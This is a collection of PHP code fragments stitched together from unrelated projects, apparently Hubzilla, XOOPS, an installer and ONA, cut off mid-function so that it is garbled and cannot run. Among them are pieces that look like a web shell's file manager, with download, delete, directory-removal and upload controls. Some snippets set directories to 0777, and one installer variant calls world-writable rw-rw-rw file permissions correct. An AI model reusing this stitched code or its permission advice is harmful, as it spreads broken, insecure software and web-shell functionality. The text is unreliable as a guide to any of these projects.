group_add_member($uid, '', $xchan_hash, $g['id']);
}
}
$result['success'] = true;
return $result;
}
if (@filetype($j_d . "/" . $file) == "file") {
echo "<center>[Download]";
} else {
echo "</a><center>[-]";
}
echo "</a></td><td><a href=" . $surl . "&" . $word . "&delete&file_browser&file=" . urlencode($j_d) . "/" . urlencode($file) . ">";
if (@filetype($j_d . "/" . $file) == "file") {
echo "<center>[Delete]";
} else {
echo "</a><center><a href=" . $surl . "&" . $word . "&rmdir&file_browser&file=" . urlencode($j_d) . "/" . urlencode($file) . ">[Delete]</a>";
}
echo "<td><center>";
echo @fileowner($j_f . "/" . $file);
echo "</td>";
echo "<td><center>";
get_perms(fileperms($j_f . "/" . $file));
echo "</td>";
echo "</a></td>";
}
echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">\n\n <thead>\n <tr>\n <th></th><td>";
?>
<form enctype="multipart/form-data" action=<?php
echo $surl;
?>
&<?php
echo $word;
?>
&upload method="post">
file:         <input name="userfile" type="file">
<input type="hidden" name="file" value=<?php
echo urlencode($_GET['file']);
}
echo "</td><td>";
str_replace("//", "/", $smiliepath);
@chmod(XOOPS_ROOT_PATH . "/" . $smiliepath, 0777);
echo "<tr><td class='even' width=60%>";
echo "<b>" . _AM_SMILIEFILEPATH . "</b>" . sprintf(XOOPS_ROOT_PATH . "/" . $smiliepath) . "";
echo "</td><td class='odd'> <b>Attr:</b> " . get_perms(XOOPS_ROOT_PATH . "/" . $smiliepath);
if (!is_dir(XOOPS_ROOT_PATH . "/" . $smiliepath) || !is_writeable(XOOPS_ROOT_PATH . "/" . $smiliepath)) {
echo "<i><b><font color=\"#FF0000\">" . _AM_CMODERROR . "</font></b></i>";
}
echo "</td><td>";
str_replace("//", "/", $htmlpath);
chmod(XOOPS_ROOT_PATH . "/" . $htmlpath, 0777);
echo "<tr><td class='even' width=60%>";
echo "<b>" . _AM_HTMLFILEPATH . "</b>" . sprintf(XOOPS_ROOT_PATH . "/" . $htmlpath) . "";
echo "</td><td class='odd'> <b>Attr:</b> " . get_perms(XOOPS_ROOT_PATH . "/" . $htmlpath);
if (!is_dir(XOOPS_ROOT_PATH . "/" . $htmlpath) || !is_writeable(XOOPS_ROOT_PATH . "/" . $htmlpath)) {
echo "<i><b><font color=\"#FF0000\">" . _AM_CMODERROR . "</font></b></i>";
}
echo "</td><td>";
$defaults = '0';
if ($xoopsUser->uid() == 1) {
if ($xoopsUser->isadmin($xoopsModule->mid())) {
echo "<tr><td class='odd' colspan='2'> </td></tr>";
echo "<tr><td class='head'>" . _AM_DEFAULTS . "</td>";
echo "<td class='even'>";
if ($defaults == '1') {
echo "<input type='radio' name='defaults' value='1' checked='checked' /> " . _AM_YES . " ";
echo "<input type='radio' name='defaults' value='0' /> " . _AM_NO . " ";
} else {
echo "<input type='radio' name='defaults' value='1' /> " . _AM_YES . " ";
function get()
{
$sort_type = 0;
$o = '';
if (!local_channel()) {
notice(t('Permission denied.') . EOL);
return login();
}
$channel = \App::get_channel();
$my_perms = get_channel_default_perms(local_channel());
$role = get_pconfig(local_channel(), 'system', 'permissions_role');
if ($role) {
$x = get_role_perms($role);
if ($x['perms_accept']) {
$my_perms = $x['perms_accept'];
}
}
$yes_no = array(t('No'), t('Yes'));
if ($my_perms) {
$o .= "<script>function connectDefaultShare() {\n\t\t\t\$('.abook-edit-me').each(function() {\n\t\t\t\tif(! \$(this).is(':disabled'))\n\t\t\t\t\t\$(this).prop('checked', false);\n\t\t\t});\n\n";
$perms = get_perms();
foreach ($perms as $p => $v) {
if ($my_perms & $v[1]) {
$o .= "\$('#me_id_perms_" . $p . "').prop('checked', true); \n";
}
}
$o .= " }\n</script>\n";
}
if (argc() == 3) {
$contact_id = intval(argv(1));
if (!$contact_id) {
return;
}
$cmd = argv(2);
$orig_record = q("SELECT abook.*, xchan.* FROM abook left join xchan on abook_xchan = xchan_hash\n\t\t\t\tWHERE abook_id = %d AND abook_channel = %d AND abook_self = 0 LIMIT 1", intval($contact_id), intval(local_channel()));
if (!count($orig_record)) {
notice(t('Could not access address book record.') . EOL);
goaway(z_root() . '/connections');
}
if ($cmd === 'update') {
// pull feed and consume it, which should subscribe to the hub.
proc_run('php', "include/poller.php", "{$contact_id}");
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'refresh') {
if ($orig_record[0]['xchan_network'] === 'zot') {
if (!zot_refresh($orig_record[0], \App::get_channel())) {
notice(t('Refresh failed - channel is currently unavailable.'));
}
} else {
// if you are on a different network we'll force a refresh of the connection basic info
proc_run('php', 'include/notifier.php', 'permission_update', $contact_id);
}
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'block') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_BLOCKED)) {
$this->connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'ignore') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_IGNORED)) {
$this->connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'archive') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_ARCHIVED)) {
$this->connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'hide') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_HIDDEN)) {
$this->connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway(z_root() . '/connedit/' . $contact_id);
}
// We'll prevent somebody from unapproving an already approved contact.
// Though maybe somebody will want this eventually (??)
if ($cmd === 'approve') {
if (intval($orig_record[0]['abook_pending'])) {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_PENDING)) {
$this->connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
}
goaway(z_root() . '/connedit/' . $contact_id);
}
if ($cmd === 'drop') {
require_once 'include/Contact.php';
// FIXME
// We need to send either a purge or a refresh packet to the other side (the channel being unfriended).
// The issue is that the abook DB record _may_ get destroyed when we call contact_remove. As the notifier runs
// in the background there could be a race condition preventing this packet from being sent in all cases.
// PLACEHOLDER
contact_remove(local_channel(), $orig_record[0]['abook_id']);
build_sync_packet(0, array('abook' => array(array('abook_xchan' => $orig_record[0]['abook_xchan'], 'entry_deleted' => true))));
info(t('Connection has been removed.') . EOL);
if (x($_SESSION, 'return_url')) {
goaway(z_root() . '/' . $_SESSION['return_url']);
}
goaway(z_root() . '/contacts');
}
}
if (\App::$poi) {
$contact_id = \App::$poi['abook_id'];
$contact = \App::$poi;
$tools = array('view' => array('label' => t('View Profile'), 'url' => chanlink_cid($contact['abook_id']), 'sel' => '', 'title' => sprintf(t('View %s\'s profile'), $contact['xchan_name'])), 'refresh' => array('label' => t('Refresh Permissions'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/refresh', 'sel' => '', 'title' => t('Fetch updated permissions')), 'recent' => array('label' => t('Recent Activity'), 'url' => z_root() . '/network/?f=&cid=' . $contact['abook_id'], 'sel' => '', 'title' => t('View recent posts and comments')), 'block' => array('label' => intval($contact['abook_blocked']) ? t('Unblock') : t('Block'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/block', 'sel' => intval($contact['abook_blocked']) ? 'active' : '', 'title' => t('Block (or Unblock) all communications with this connection'), 'info' => intval($contact['abook_blocked']) ? t('This connection is blocked!') : ''), 'ignore' => array('label' => intval($contact['abook_ignored']) ? t('Unignore') : t('Ignore'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/ignore', 'sel' => intval($contact['abook_ignored']) ? 'active' : '', 'title' => t('Ignore (or Unignore) all inbound communications from this connection'), 'info' => intval($contact['abook_ignored']) ? t('This connection is ignored!') : ''), 'archive' => array('label' => intval($contact['abook_archived']) ? t('Unarchive') : t('Archive'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/archive', 'sel' => intval($contact['abook_archived']) ? 'active' : '', 'title' => t('Archive (or Unarchive) this connection - mark channel dead but keep content'), 'info' => intval($contact['abook_archived']) ? t('This connection is archived!') : ''), 'hide' => array('label' => intval($contact['abook_hidden']) ? t('Unhide') : t('Hide'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/hide', 'sel' => intval($contact['abook_hidden']) ? 'active' : '', 'title' => t('Hide or Unhide this connection from your other connections'), 'info' => intval($contact['abook_hidden']) ? t('This connection is hidden!') : ''), 'delete' => array('label' => t('Delete'), 'url' => z_root() . '/connedit/' . $contact['abook_id'] . '/drop', 'sel' => '', 'title' => t('Delete this connection')));
$self = false;
if (intval($contact['abook_self'])) {
$self = true;
}
require_once 'include/contact_selectors.php';
$tpl = get_markup_template("abook_edit.tpl");
if (feature_enabled(local_channel(), 'affinity')) {
$labels = array(t('Me'), t('Family'), t('Friends'), t('Acquaintances'), t('All'));
call_hooks('affinity_labels', $labels);
$label_str = '';
if ($labels) {
foreach ($labels as $l) {
if ($label_str) {
$label_str .= ", '|'";
$label_str .= ", '" . $l . "'";
} else {
$label_str .= "'" . $l . "'";
}
}
}
$slider_tpl = get_markup_template('contact_slider.tpl');
$slide = replace_macros($slider_tpl, array('$min' => 1, '$val' => $contact['abook_closeness'] ? $contact['abook_closeness'] : 99, '$labels' => $label_str));
}
$rating_val = 0;
$rating_text = '';
$xl = q("select * from xlink where xlink_xchan = '%s' and xlink_link = '%s' and xlink_static = 1", dbesc($channel['channel_hash']), dbesc($contact['xchan_hash']));
if ($xl) {
$rating_val = intval($xl[0]['xlink_rating']);
$rating_text = $xl[0]['xlink_rating_text'];
}
$poco_rating = get_config('system', 'poco_rating_enable');
// if unset default to enabled
if ($poco_rating === false) {
$poco_rating = true;
}
if ($poco_rating) {
$rating = replace_macros(get_markup_template('rating_slider.tpl'), array('$min' => -10, '$val' => $rating_val));
} else {
$rating = false;
}
$perms = array();
$channel = \App::get_channel();
$global_perms = get_perms();
$existing = get_all_perms(local_channel(), $contact['abook_xchan']);
$unapproved = array('pending', t('Approve this connection'), '', t('Accept connection to allow communication'), array(t('No'), 'Yes'));
$multiprofs = feature_enabled(local_channel(), 'multi_profiles') ? true : false;
if ($slide && !$multiprofs) {
$affinity = t('Set Affinity');
}
if (!$slide && $multiprofs) {
$affinity = t('Set Profile');
}
if ($slide && $multiprofs) {
$affinity = t('Set Affinity & Profile');
}
foreach ($global_perms as $k => $v) {
$thisperm = $contact['abook_my_perms'] & $v[1] ? "1" : '';
$checkinherited = $channel[$v[0]] && $channel[$v[0]] != PERMS_SPECIFIC ? "1" : '';
// For auto permissions (when $self is true) we don't want to look at existing
// permissions because they are enabled for the channel owner
if (!$self && $existing[$k]) {
$thisperm = "1";
}
$perms[] = array('perms_' . $k, $v[3], $contact['abook_their_perms'] & $v[1] ? "1" : "", $thisperm, $v[1], $channel[$v[0]] == PERMS_SPECIFIC ? '' : '1', $v[4], $checkinherited);
}
$locstr = '';
$locs = q("select hubloc_addr as location from hubloc left join site on hubloc_url = site_url where hubloc_hash = '%s'\n\t\t\t\tand hubloc_deleted = 0 and site_dead = 0", dbesc($contact['xchan_hash']));
if ($locs) {
foreach ($locs as $l) {
if (!$l['location']) {
continue;
}
if (strpos($locstr, $l['location']) !== false) {
continue;
}
if (strlen($locstr)) {
$locstr .= ', ';
}
$locstr .= $l['location'];
}
} else {
$locstr = t('none');
}
$o .= replace_macros($tpl, array('$header' => $self ? t('Connection Default Permissions') : sprintf(t('Connection: %s'), $contact['xchan_name']), '$autoperms' => array('autoperms', t('Apply these permissions automatically'), get_pconfig(local_channel(), 'system', 'autoperms') ? 1 : 0, t('Connection requests will be approved without your interaction'), $yes_no), '$addr' => $contact['xchan_addr'], '$addr_text' => t('This connection\'s primary address is'), '$loc_text' => t('Available locations:'), '$locstr' => $locstr, '$notself' => $self ? '' : '1', '$self' => $self ? '1' : '', '$autolbl' => t('The permissions indicated on this page will be applied to all new connections.'), '$tools_label' => t('Connection Tools'), '$tools' => $self ? '' : $tools, '$lbl_slider' => t('Slide to adjust your degree of friendship'), '$lbl_rating' => t('Rating'), '$lbl_rating_label' => t('Slide to adjust your rating'), '$lbl_rating_txt' => t('Optionally explain your rating'), '$connfilter' => feature_enabled(local_channel(), 'connfilter'), '$connfilter_label' => t('Custom Filter'), '$incl' => array('abook_incl', t('Only import posts with this text'), $contact['abook_incl'], t('words one per line or #tags or /patterns/ or lang=xx, leave blank to import all posts')), '$excl' => array('abook_excl', t('Do not import posts with this text'), $contact['abook_excl'], t('words one per line or #tags or /patterns/ or lang=xx, leave blank to import all posts')), '$rating_text' => array('rating_text', t('Optionally explain your rating'), $rating_text, ''), '$rating_info' => t('This information is public!'), '$rating' => $rating, '$rating_val' => $rating_val, '$slide' => $slide, '$affinity' => $affinity, '$pending_label' => t('Connection Pending Approval'), '$is_pending' => intval($contact['abook_pending']) ? 1 : '', '$unapproved' => $unapproved, '$inherited' => t('inherited'), '$submit' => t('Submit'), '$lbl_vis2' => sprintf(t('Please choose the profile you would like to display to %s when viewing your profile securely.'), $contact['xchan_name']), '$close' => $contact['abook_closeness'], '$them' => t('Their Settings'), '$me' => t('My Settings'), '$perms' => $perms, '$permlbl' => t('Individual Permissions'), '$permnote' => t('Some permissions may be inherited from your channel\'s <a href="settings"><strong>privacy settings</strong></a>, which have higher priority than individual settings. You can <strong>not</strong> change those settings here.'), '$permnote_self' => t('Some permissions may be inherited from your channel\'s <a href="settings"><strong>privacy settings</strong></a>, which have higher priority than individual settings. You can change those settings here but they wont have any impact unless the inherited setting changes.'), '$lastupdtext' => t('Last update:'), '$last_update' => relative_date($contact['abook_connected']), '$profile_select' => contact_profile_assign($contact['abook_profile']), '$multiprofs' => $multiprofs, '$contact_id' => $contact['abook_id'], '$name' => $contact['xchan_name']));
$arr = array('contact' => $contact, 'output' => $o);
call_hooks('contact_edit', $arr);
return $arr['output'];
}
}
function ws_logingo($window_name, $form = '')
{
global $conf, $self, $onadb, $baseURL;
global $font_family, $color, $style, $images;
$html = $js = '';
$form = parse_options_string($form);
$type = 'Desktop';
if ($form['standalone']) {
$type = 'Standalone';
}
printmsg("INFO => [{$type}] Attempting login as " . $form['onausername'], 4);
list($status, $js) = get_authentication($form['onausername'], $form['onapassword']);
if ($status == 0) {
get_perms($form['onausername']);
if ($form['standalone'] == 'standalone') {
$js .= "window.location='{$http}{$baseURL}/';";
}
$js .= "el('loggedin_user').innerHTML = '{$_SESSION['ona']['auth']['user']['username']}';";
printmsg("INFO => [{$type}] {$_SESSION['ona']['auth']['user']['username']} has logged in via authtype: {$conf['authtype']}", 0);
}
$response = new xajaxResponse();
$response->addScript($js);
return $response->getXML();
}
if ($mode) {
if (($mode & 0666) == 0666) {
echo "<li><font color=\"red\">Database configuration file {$dbconfile} has incorrect " . get_perms($mode) . " permissions.\n";
echo "<br>Please change permissions to rw-r--r-- and try again!</font>\n";
} else {
echo "<li><font color=\"green\">Database configuration file {$dbconfile} has correct " . get_perms($mode) . " permissions.</font>\n";
}
}
/* File permissions for PHPLIB prepend */
$mode = fileperms($prependfile);
if ($mode) {
if (($mode & 0666) == 0666) {
echo "<li><font color=\"red\">PHPlib prepend file {$prependfile} has incorrect " . get_perms($mode) . " permissions.\n";
echo "<br>Please change permissions to rw-r--r--!</font>\n";
} else {
echo "<li><font color=\"green\">PHPlib prepend file {$prependfile} has correct " . get_perms($mode) . " permissions.</font>\n";
}
}
?>
</ul>
<p><b>Congratulations!</b>
<ul>
<li><?php
echo $sys_name;
?>
is correctly installed.
<br>Now visit the <a href="<?php
echo $sys_url;
?>
"><?php
echo $sys_name;
/**
* @brief Sets site wide default permissions.
*
* @return array
*/
function site_default_perms()
{
$ret = array();
$typical = array('view_stream' => PERMS_PUBLIC, 'view_profile' => PERMS_PUBLIC, 'view_contacts' => PERMS_PUBLIC, 'view_storage' => PERMS_PUBLIC, 'view_pages' => PERMS_PUBLIC, 'send_stream' => PERMS_SPECIFIC, 'post_wall' => PERMS_SPECIFIC, 'post_comments' => PERMS_SPECIFIC, 'post_mail' => PERMS_SPECIFIC, 'tag_deliver' => PERMS_SPECIFIC, 'chat' => PERMS_SPECIFIC, 'write_storage' => PERMS_SPECIFIC, 'write_pages' => PERMS_SPECIFIC, 'delegate' => PERMS_SPECIFIC, 'post_like' => PERMS_NETWORK);
$global_perms = get_perms();
foreach ($global_perms as $perm => $v) {
$x = get_config('default_perms', $perm);
if ($x === false) {
$x = $typical[$perm];
}
$ret[$perm] = $x;
}
return $ret;
}
function mail_post(&$a)
{
if (!local_channel()) {
return;
}
$replyto = x($_REQUEST, 'replyto') ? notags(trim($_REQUEST['replyto'])) : '';
$subject = x($_REQUEST, 'subject') ? notags(trim($_REQUEST['subject'])) : '';
$body = x($_REQUEST, 'body') ? escape_tags(trim($_REQUEST['body'])) : '';
$recipient = x($_REQUEST, 'messageto') ? notags(trim($_REQUEST['messageto'])) : '';
$rstr = x($_REQUEST, 'messagerecip') ? notags(trim($_REQUEST['messagerecip'])) : '';
$preview = x($_REQUEST, 'preview') ? intval($_REQUEST['preview']) : 0;
$expires = x($_REQUEST, 'expires') ? datetime_convert(date_default_timezone_get(), 'UTC', $_REQUEST['expires']) : NULL_DATE;
// If we have a raw string for a recipient which hasn't been auto-filled,
// it means they probably aren't in our address book, hence we don't know
// if we have permission to send them private messages.
// finger them and find out before we try and send it.
if (!$recipient) {
$channel = App::get_channel();
$ret = zot_finger($rstr, $channel);
if (!$ret['success']) {
notice(t('Unable to lookup recipient.') . EOL);
return;
}
$j = json_decode($ret['body'], true);
logger('message_post: lookup: ' . $url . ' ' . print_r($j, true));
if (!($j['success'] && $j['guid'])) {
notice(t('Unable to communicate with requested channel.'));
return;
}
$x = import_xchan($j);
if (!$x['success']) {
notice(t('Cannot verify requested channel.'));
return;
}
$recipient = $x['hash'];
$their_perms = 0;
$global_perms = get_perms();
if ($j['permissions']['data']) {
$permissions = crypto_unencapsulate($j['permissions'], $channel['channel_prvkey']);
if ($permissions) {
$permissions = json_decode($permissions);
}
logger('decrypted permissions: ' . print_r($permissions, true), LOGGER_DATA);
} else {
$permissions = $j['permissions'];
}
foreach ($permissions as $k => $v) {
if ($v) {
$their_perms = $their_perms | intval($global_perms[$k][1]);
}
}
if (!($their_perms & PERMS_W_MAIL)) {
notice(t('Selected channel has private message restrictions. Send failed.'));
// reported issue: let's still save the message and continue. We'll just tell them
// that nothing useful is likely to happen. They might have spent hours on it.
// return;
}
}
// if(feature_enabled(local_channel(),'richtext')) {
// $body = fix_mce_lf($body);
// }
require_once 'include/text.php';
linkify_tags($a, $body, local_channel());
if ($preview) {
}
if (!$recipient) {
notice('No recipient found.');
App::$argc = 2;
App::$argv[1] = 'new';
return;
}
// We have a local_channel, let send_message use the session channel and save a lookup
$ret = send_message(0, $recipient, $body, $subject, $replyto, $expires);
if ($ret['success']) {
xchan_mail_query($ret['mail']);
build_sync_packet(0, array('conv' => array($ret['conv']), 'mail' => array(encode_mail($ret['mail'], true))));
} else {
notice($ret['message']);
}
goaway(z_root() . '/mail/combined');
}
/**
* @brief Create a new channel.
*
* Also creates the related xchan, hubloc, profile, and "self" abook records,
* and an empty "Friends" group/collection for the new channel.
*
* @param array $arr assoziative array with:
* * \e string \b name full name of channel
* * \e string \b nickname "email/url-compliant" nickname
* * \e int \b account_id to attach with this channel
* * [other identity fields as desired]
*
* @returns array
* 'success' => boolean true or false
* 'message' => optional error text if success is false
* 'channel' => if successful the created channel array
*/
function create_identity($arr)
{
$a = get_app();
$ret = array('success' => false);
if (!$arr['account_id']) {
$ret['message'] = t('No account identifier');
return $ret;
}
$ret = identity_check_service_class($arr['account_id']);
if (!$ret['success']) {
return $ret;
}
// save this for auto_friending
$total_identities = $ret['total_identities'];
$nick = mb_strtolower(trim($arr['nickname']));
if (!$nick) {
$ret['message'] = t('Nickname is required.');
return $ret;
}
$name = escape_tags($arr['name']);
$pageflags = x($arr, 'pageflags') ? intval($arr['pageflags']) : PAGE_NORMAL;
$system = x($arr, 'system') ? intval($arr['system']) : 0;
$name_error = validate_channelname($arr['name']);
if ($name_error) {
$ret['message'] = $name_error;
return $ret;
}
if ($nick === 'sys' && !$system) {
$ret['message'] = t('Reserved nickname. Please choose another.');
return $ret;
}
if (check_webbie(array($nick)) !== $nick) {
$ret['message'] = t('Nickname has unsupported characters or is already being used on this site.');
return $ret;
}
$guid = zot_new_uid($nick);
$key = new_keypair(4096);
$sig = base64url_encode(rsa_sign($guid, $key['prvkey']));
$hash = make_xchan_hash($guid, $sig);
// Force a few things on the short term until we can provide a theme or app with choice
$publish = 1;
if (array_key_exists('publish', $arr)) {
$publish = intval($arr['publish']);
}
$primary = true;
if (array_key_exists('primary', $arr)) {
$primary = intval($arr['primary']);
}
$role_permissions = null;
$global_perms = get_perms();
if (array_key_exists('permissions_role', $arr) && $arr['permissions_role']) {
$role_permissions = get_role_perms($arr['permissions_role']);
if ($role_permissions) {
foreach ($role_permissions as $p => $v) {
if (strpos($p, 'channel_') !== false) {
$perms_keys .= ', ' . $p;
$perms_vals .= ', ' . intval($v);
}
if ($p === 'directory_publish') {
$publish = intval($v);
}
}
}
} else {
$defperms = site_default_perms();
foreach ($defperms as $p => $v) {
$perms_keys .= ', ' . $global_perms[$p][0];
$perms_vals .= ', ' . intval($v);
}
}
$expire = 0;
$r = q("insert into channel ( channel_account_id, channel_primary, \n\t\tchannel_name, channel_address, channel_guid, channel_guid_sig,\n\t\tchannel_hash, channel_prvkey, channel_pubkey, channel_pageflags, channel_system, channel_expire_days, channel_timezone {$perms_keys} )\n\t\tvalues ( %d, %d, '%s', '%s', '%s', '%s', '%s', '%s', '%s', %d, %d, %d, '%s' {$perms_vals} ) ", intval($arr['account_id']), intval($primary), dbesc($name), dbesc($nick), dbesc($guid), dbesc($sig), dbesc($hash), dbesc($key['prvkey']), dbesc($key['pubkey']), intval($pageflags), intval($system), intval($expire), dbesc($a->timezone));
$r = q("select * from channel where channel_account_id = %d \n\t\tand channel_guid = '%s' limit 1", intval($arr['account_id']), dbesc($guid));
if (!$r) {
$ret['message'] = t('Unable to retrieve created identity');
return $ret;
}
$ret['channel'] = $r[0];
if (intval($arr['account_id'])) {
set_default_login_identity($arr['account_id'], $ret['channel']['channel_id'], false);
}
// Create a verified hub location pointing to this site.
$r = q("insert into hubloc ( hubloc_guid, hubloc_guid_sig, hubloc_hash, hubloc_addr, hubloc_primary, \n\t\thubloc_url, hubloc_url_sig, hubloc_host, hubloc_callback, hubloc_sitekey, hubloc_network )\n\t\tvalues ( '%s', '%s', '%s', '%s', %d, '%s', '%s', '%s', '%s', '%s', '%s' )", dbesc($guid), dbesc($sig), dbesc($hash), dbesc($ret['channel']['channel_address'] . '@' . get_app()->get_hostname()), intval($primary), dbesc(z_root()), dbesc(base64url_encode(rsa_sign(z_root(), $ret['channel']['channel_prvkey']))), dbesc(get_app()->get_hostname()), dbesc(z_root() . '/post'), dbesc(get_config('system', 'pubkey')), dbesc('zot'));
if (!$r) {
logger('create_identity: Unable to store hub location');
}
$newuid = $ret['channel']['channel_id'];
$r = q("insert into xchan ( xchan_hash, xchan_guid, xchan_guid_sig, xchan_pubkey, xchan_photo_l, xchan_photo_m, xchan_photo_s, xchan_addr, xchan_url, xchan_follow, xchan_connurl, xchan_name, xchan_network, xchan_photo_date, xchan_name_date, xchan_system ) values ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', %d)", dbesc($hash), dbesc($guid), dbesc($sig), dbesc($key['pubkey']), dbesc($a->get_baseurl() . "/photo/profile/l/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/m/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/s/{$newuid}"), dbesc($ret['channel']['channel_address'] . '@' . get_app()->get_hostname()), dbesc(z_root() . '/channel/' . $ret['channel']['channel_address']), dbesc(z_root() . '/follow?f=&url=%s'), dbesc(z_root() . '/poco/' . $ret['channel']['channel_address']), dbesc($ret['channel']['channel_name']), dbesc('zot'), dbesc(datetime_convert()), dbesc(datetime_convert()), intval($system));
// Not checking return value.
// It's ok for this to fail if it's an imported channel, and therefore the hash is a duplicate
$r = q("INSERT INTO profile ( aid, uid, profile_guid, profile_name, is_default, publish, name, photo, thumb)\n\t\tVALUES ( %d, %d, '%s', '%s', %d, %d, '%s', '%s', '%s') ", intval($ret['channel']['channel_account_id']), intval($newuid), dbesc(random_string()), t('Default Profile'), 1, $publish, dbesc($ret['channel']['channel_name']), dbesc($a->get_baseurl() . "/photo/profile/l/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/m/{$newuid}"));
if ($role_permissions) {
$myperms = array_key_exists('perms_auto', $role_permissions) && $role_permissions['perms_auto'] ? intval($role_permissions['perms_accept']) : 0;
} else {
$myperms = PERMS_R_STREAM | PERMS_R_PROFILE | PERMS_R_PHOTOS | PERMS_R_ABOOK | PERMS_W_STREAM | PERMS_W_WALL | PERMS_W_COMMENT | PERMS_W_MAIL | PERMS_W_CHAT | PERMS_R_STORAGE | PERMS_R_PAGES | PERMS_W_LIKE;
}
$r = q("insert into abook ( abook_account, abook_channel, abook_xchan, abook_closeness, abook_created, abook_updated, abook_self, abook_my_perms )\n\t\tvalues ( %d, %d, '%s', %d, '%s', '%s', %d, %d ) ", intval($ret['channel']['channel_account_id']), intval($newuid), dbesc($hash), intval(0), dbesc(datetime_convert()), dbesc(datetime_convert()), intval(1), intval($myperms));
if (intval($ret['channel']['channel_account_id'])) {
// Save our permissions role so we can perhaps call it up and modify it later.
if ($role_permissions) {
set_pconfig($newuid, 'system', 'permissions_role', $arr['permissions_role']);
if (array_key_exists('online', $role_permissions)) {
set_pconfig($newuid, 'system', 'hide_presence', 1 - intval($role_permissions['online']));
}
if (array_key_exists('perms_auto', $role_permissions)) {
set_pconfig($newuid, 'system', 'autoperms', $role_permissions['perms_auto'] ? $role_permissions['perms_accept'] : 0);
}
}
// Create a group with yourself as a member. This allows somebody to use it
// right away as a default group for new contacts.
require_once 'include/group.php';
group_add($newuid, t('Friends'));
group_add_member($newuid, t('Friends'), $ret['channel']['channel_hash']);
// if our role_permissions indicate that we're using a default collection ACL, add it.
if (is_array($role_permissions) && $role_permissions['default_collection']) {
$r = q("select hash from groups where uid = %d and name = '%s' limit 1", intval($newuid), dbesc(t('Friends')));
if ($r) {
q("update channel set channel_default_group = '%s', channel_allow_gid = '%s' where channel_id = %d", dbesc($r[0]['hash']), dbesc('<' . $r[0]['hash'] . '>'), intval($newuid));
}
}
if (!$system) {
set_pconfig($ret['channel']['channel_id'], 'system', 'photo_path', '%Y-%m');
set_pconfig($ret['channel']['channel_id'], 'system', 'attach_path', '%Y-%m');
}
// auto-follow any of the hub's pre-configured channel choices.
// Only do this if it's the first channel for this account;
// otherwise it could get annoying. Don't make this list too big
// or it will impact registration time.
$accts = get_config('system', 'auto_follow');
if ($accts && !$total_identities) {
require_once 'include/follow.php';
if (!is_array($accts)) {
$accts = array($accts);
}
foreach ($accts as $acct) {
if (trim($acct)) {
new_contact($newuid, trim($acct), $ret['channel'], false);
}
}
}
call_hooks('create_identity', $newuid);
proc_run('php', 'include/directory.php', $ret['channel']['channel_id']);
}
$ret['success'] = true;
return $ret;
}
$mode = fileperms($dbconfile);
if ($mode) {
if (($mode & 0666) == 0666) {
echo "<li><font color=\"green\">Database configuration file {$dbconfile} has correct " . get_perms($mode) . " permissions.</font>\n";
} else {
echo "<li><font color=\"red\">Database configuration file {$dbconfile} has incorrect " . get_perms($mode) . " permissions.\n";
echo "<br>Please change permissions to rw-rw-rw and try again!</font>\n";
}
}
/* File permissions for PHPLIB prepend */
$mode = fileperms($prependfile);
if ($mode) {
if (($mode & 0666) == 0666) {
echo "<li><font color=\"green\">PHPlib prepend file {$prependfile} has correct " . get_perms($mode) . " permissions.</font>\n";
} else {
echo "<li><font color=\"red\">PHPlib prepend file {$prependfile} has incorrect " . get_perms($mode) . " permissions.\n";
echo "<br>Please change permissions to rw-rw-rw and try again!</font>\n";
}
}
echo "</ul>\n";
/* PHP Version */
$some_no = 0;
$version = phpversion();
$major = $version[0];
$pl = strstr($version, "pl");
if ($pl) {
$version = substr_replace($version, '', -strlen($pl));
}
if ($major == 3) {
$bits = explode('.', $version);
$minor = $bits[count($bits) - 1];
function showdir($pwd, $prompt)
{
$fname = array();
$dname = array();
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$user = "******";
if ($dh = opendir($pwd)) {
while ($file = readdir($dh)) {
if (is_dir($file)) {
$dname[] = $file;
} elseif (is_file($file)) {
$fname[] = $file;
}
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR, $pwd);
$tree = @sizeof($path);
$parent = "";
